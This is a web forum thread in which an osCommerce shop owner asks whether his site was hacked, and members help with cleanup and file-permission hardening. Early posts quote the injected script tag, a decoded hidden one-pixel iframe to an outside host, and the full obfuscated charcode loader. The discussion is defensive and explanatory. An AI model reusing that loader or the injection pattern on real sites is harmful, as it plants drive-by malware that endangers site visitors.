Was my site hacked?

[rod_c]

Hi All.

The other day I noticed that when viewing my site the web browser was saying that not all the items on the site where running through my SSL.

So I had a look through index.php and found this code

<script type='text/javascript' src='http://4ura.net/js_new.js'></script>

 

It had been added just before the </body> tag. I haven’t ever seen this code before and I have no idea where it came from. I also found it in other files on my site.

Does anyone know what cursed it and how to prevent it from happening again?

[germ]

Just for grins and giggles I downloaded the script and decoded it.

 

I got this:

 

<iframe src="http://v84.org/in.ci?2" width=1 height=1 style="visibility: hidden"></iframe>

As far as I know, iframes are a way to steal information from a web page.

 

The original script looks like this:

 

a=new Array('0.06e+3','10.5e+1','10.2e+1','11.4e+1','0.097e+3','0.109e+3','1.01e+2','0.32e+2','11.5e+1','0.114e+3','0.099e+3','0.61e+2','3.4e+1','10.4e+1','0.116e+3','11.6e+1','1.12e+2','0.058e+3','4.7e+1','0.47e+2','1.18e+2','0.56e+2','0.52e+2','4.6e+1','0.111e+3','1.14e+2','10.3e+1','4.7e+1','1.05e+2','0.11e+3','0.046e+3','0.099e+3','0.103e+3','10.5e+1','0.063e+3','0.5e+2','3.4e+1','0.32e+2','1.19e+2','0.105e+3','10e+1','0.116e+3','0.104e+3','0.61e+2','0.049e+3','0.32e+2','10.4e+1','0.101e+3','0.105e+3','10.3e+1','10.4e+1','1.16e+2','0.061e+3','0.49e+2','3.2e+1','1.15e+2','11.6e+1','12.1e+1','1.08e+2','10.1e+1','6.1e+1','0.34e+2','0.118e+3','1.05e+2','11.5e+1','0.105e+3','0.98e+2','1.05e+2','0.108e+3','10.5e+1','0.116e+3','0.121e+3','0.058e+3','3.2e+1','0.104e+3','1.05e+2','0.1e+3','0.1e+3','10.1e+1','1.1e+2','3.4e+1','0.62e+2','6e+1','0.47e+2','1.05e+2','1.02e+2','11.4e+1','0.97e+2','0.109e+3','0.101e+3','0.62e+2');for(var p in a){document.write(String.fromCharCode(parseFloat(a[p])));};

[germ]

How to prevent it?

 

Check ALL your files and remove the offending code.

 

Check for files "planted" on your site (files you didn't create or put there).

 

Change ALL your passwords (FTP, Cpanel,.htaccess, osC admin).

 

Check all your permissions: Folders should be 755, Files should be 644

 

And if you install this contribution:

 

Site Monitor

 

It will warn you if files get altered again.

 

I may have left something out.

 

If anyone else has anything to add, post away!

[rod_c]

The only thing I can think of that could have corsed this is the last addon I installed "UltraPics_2_08.zip"

 

Has any one alse had a problem with this addon??

[germ]

If you have a permissions problem it could be that some wandering hacking bot finally found your site and bit you.

 

I had a permissions problem and the site was online for about 11 months before a different, less insidious, bot got to me.

:blush:

[rod_c]

I have just been through all my files and folders and they seem to be set correctly. Is there any easier way to check the files then doing it manually through my hosts control panel and checking every file individually?

 

I think I checked them all but I don’t know I could have missed something.

 

EDIT: Some of the files that where edited where in my admin section that was protected with a.htacces file. How would it have got past that?

[germ]

If you FTP all your files to your PC, ways to search for text are discussed here:

 

Click Me

 

I had a folder in the admin hacked and it was protected by .htaccess, too.

 

Mine was a permissions problem.

 

Yours could be something else entirely.

 

Hard to say really.

 

It might not even be anything on your site.

 

If the server was hacked there's nothing you can do about that.

 

You should probably report this to your host.

[rod_c]

Thanks Jim, I allready scanned all the files for the code and removed it. But what I ment in my last post was is there an easy way to check your permissions?

 

I have also opened a support ticket with my host and im wating for a reply.

[germ]

Someone just made a contribution for that:

 

Click Me

 

I haven't tried it, so I don't know how well it does/doesn't work.

[rod_c]

I installed that contribution to show you all the file and folder permissions and it works grate.

 

A quick couple of questions though,

 

1. That contribution has alot of the files to be set to 755 but mine are allready set to 644 should I leave them at 644?

 

2. Some of the folders on my site where set to 777 chould this have been the cause of my infection?

 

EDIT: 3. Is it likly that theres a file on my site that will reinfect my site? if so how do i find it?

[rod_c]

Actuly some of the folder like catalog/images/ are ment to be set to 777

http://www.oscommerce.info/kb/osCommerce/I...nd_Upgrades/224

 

Is that a security risk??

[Guest]

yes. any folder at 777 allows the world to write to that folder.

 

i've seen a lot of "i was hacked" topics mention /images/ is chmodded to 777.

set it to 755

 

777 = read, write & execute permissions to everyone

755 = read, execute to everyone and write permissions to the owner

[FIMBLE]

Worth pointing out that some hosts will not allow you to upload images etc.. at 755 and you need to have 777 in order for the store to work.

Its worth checking your hosts to see if this is you, and if it is ask them to sort this out.

If they say it cannot be done change hosts to someone who will.

 

Regards

Nic

[rod_c]

Thanks every one for your input, I'm just waiting on my host to let me know if they will allow me to upload images with the 755 permissions.

 

Although its most likely that the problem occurred from incorrect permissions, is it possible that it was caused from one of the contributions i have added to my site? (All contributions where found on this site and had been around for a while.)

[FIMBLE]

Anything is possible, which ones have you got?

I think that is it more than likely that they got in through the images folders.

Try searching for some security contributions

IP Trap

Site Monitor

Cross site scripting

None of them are the ultimate answer just extra security.

Combined they can be useful

Nic

[germ]

You can have your images folder at 755 and still upload images if you install a contribution called osC File Browser.

 

The way it works is you use FTP or Cpanel or whatever to upload images beforehand.

 

Then in your Admin a box pops up and you just pick the image when creating/editing categories and products.

 

There are several requirements to be able to use this mod so check that out before you try to install.

 

And just an FYI, NEVER EVER have a web accessible folder set to 777 permissions.

 

If you do it's not a question of IF you get hacked, it's just WHEN.

[alternative pope]

I've thought my site was hacked & it prob has been due 2 lack of experience, but whenever my host 123ehost fixed a problem for me (I always tried to sort it out myself, & sometimes I did). But my host didn't mention anything about it being hacked or not even tho I asked them more than once. Are they hiding something? Is this common?

 

One last question & maybe something 2 ponder over, & I'M NOT NAMING NAMES OR ACCUSING ANY MEMBERS ON THIS FORUM cause I really don't hav any suspicions about specific members but it will bug if I don't ask this question;

 

How likely is it that some forum members on here r targeting newbies like myself & hacking their sites (for purposes unknown 2 me)? I've only just thought about it.

 

 

Hope these questions help in sum way, LOL! :rolleyes:

[FIMBLE]

Anything is possible but i would say its not likely.

I cant think of anyone who would want to direct their energy this way.

Nic

[Guest]

I've thought my site was hacked & it prob has been due 2 lack of experience, but whenever my host 123ehost fixed a problem for me (I always tried to sort it out myself, & sometimes I did). But my host didn't mention anything about it being hacked or not even tho I asked them more than once. Are they hiding something? Is this common?

 

One last question & maybe something 2 ponder over, & I'M NOT NAMING NAMES OR ACCUSING ANY MEMBERS ON THIS FORUM cause I really don't hav any suspicions about specific members but it will bug if I don't ask this question;

 

How likely is it that some forum members on here r targeting newbies like myself & hacking their sites (for purposes unknown 2 me)? I've only just thought about it.

 

 

Hope these questions help in sum way, LOL! :rolleyes:

If you think that is happening, don't use the forum, remove all identifying info from your profile, and see if the condition persists.

[germ]

I've thought my site was hacked & it prob has been due 2 lack of experience, but whenever my host 123ehost fixed a problem for me (I always tried to sort it out myself, & sometimes I did). But my host didn't mention anything about it being hacked or not even tho I asked them more than once. Are they hiding something? Is this common?

 

One last question & maybe something 2 ponder over, & I'M NOT NAMING NAMES OR ACCUSING ANY MEMBERS ON THIS FORUM cause I really don't hav any suspicions about specific members but it will bug if I don't ask this question;

 

How likely is it that some forum members on here r targeting newbies like myself & hacking their sites (for purposes unknown 2 me)? I've only just thought about it.

 

 

Hope these questions help in sum way, LOL! :rolleyes:

If you don't trust the people here, you know where the door is.

 

Don't let it hit you on the gluteus maximus on the way out.

<_<

[rod_c]

Ok the add-ons I have installed are:

 

http://addons.oscommerce.com/info/1642 - UltraPics 2.08

http://addons.oscommerce.com/info/6014 - eWAY XML Payment Module

http://addons.oscommerce.com/info/2138 - Full Order IP Recorder 1.6

http://addons.oscommerce.com/info/1435 - Order Editor 5.0.6.3

http://addons.oscommerce.com/info/6051 - Product Listing Enhancements, Thumbnails & Manufacturer Headings V1.6

http://addons.oscommerce.com/info/2458 - Shipping Zones - rest of the world add-on

http://addons.oscommerce.com/info/934 - NewsDesk

http://addons.oscommerce.com/info/824 - Who's Online Enhancement

http://addons.oscommerce.com/info/1026 - Information Pages Unlimited v1.0

http://addons.oscommerce.com/info/6134 - Check Permissions 1.1

 

So Jim are you saying that I wont be able to upload images in the add product page with 755?? and I will defiantly need the "osC File Browser"?

Or is there still a chance that I might be able to upload like normal with 755?

 

Also some of the PHP files are currently set to 644 should I chance them to 755?? The "Check Permissions" add-on is saying they should be set to 755.

Just wondering what every one else has them set to.

[germ]

You'd only have to check into installing osC File Browser if in your Admin you get the "Image directory is not writable" error after changing the images folder permissions to 755

 

If you don't see the error, you're OK.

 

Like I said, there are a few requirments listed in the install directions so read them before attempting an install.

 

I disagree with the "Check Permissions" add-on.

 

I say PHP files should be 644.

 

On most servers they'd probably work either way (truth be known).

[rod_c]

OK I Installed the SiteMonitor add-on, but like some other people I get an error because the file it needs to create can’t be created because I would need to set the folder permissions to 777 which after all our discussion on the subject seems like a pretty dumb thing to do.

 

Dose any one alse have any addons for security. I would have liked to use the SiteMonitor one but can't.

[Guest]

sitemonitor works perfectly fine on 755. if it doesn't work, your host has a shoddy and insecure setup.

going on your last post, you can't work using 755?

[rod_c]

Ok If I need to change hosts I don't want to encounter the same problem again so can some of you guys please let me know who you are with so I can make sure it will work if I move.